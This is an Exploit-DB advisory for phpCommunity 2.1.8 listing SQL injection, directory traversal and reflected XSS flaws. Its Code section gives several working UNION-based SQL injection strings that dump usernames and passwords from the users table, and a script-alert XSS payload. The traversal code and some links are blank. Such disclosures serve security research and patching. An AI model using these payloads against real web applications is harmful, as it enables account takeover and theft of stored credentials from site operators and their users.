phpCommunity 2.1.8 SQL/DT/XSS Multiple Vulnerabilities

ID EDB-ID:8185
Type exploitdb
Reporter Salvatore Fresta
Modified 2009-03-09T00:00:00


phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities. CVE-2009-4886. Webapps exploit for php platform

                                            *******   Salvatore "drosophila" Fresta   *******

[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website:

[+] Bugs: [A] Multiple SQL Injection
          [B] Directory Traversal
          [C] Reflected XSS

[+] Exploitation: Remote
[+] Date: 07 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail:


[+] Menu

1) Bugs
2) Code
3) Fix


[+] Bugs

This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities 
discovered in this application.

- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php

This bug allows a guest to view username and
password of a registered user.

- [B] Directory Traversal

[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,

This bug allows a guest to read arbitrary files and 
directory on the web server.

- [C] Reflected XSS

[-] Requisites: none
[-] File affected: templates/1/login.php


[+] Code

- [A] Multiple SQL Injection' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23

- [B] Directory Traversal

- [C] Reflected XSS<script>alert('XSS');</script>


[+] Fix

No fix.


# [2009-03-09]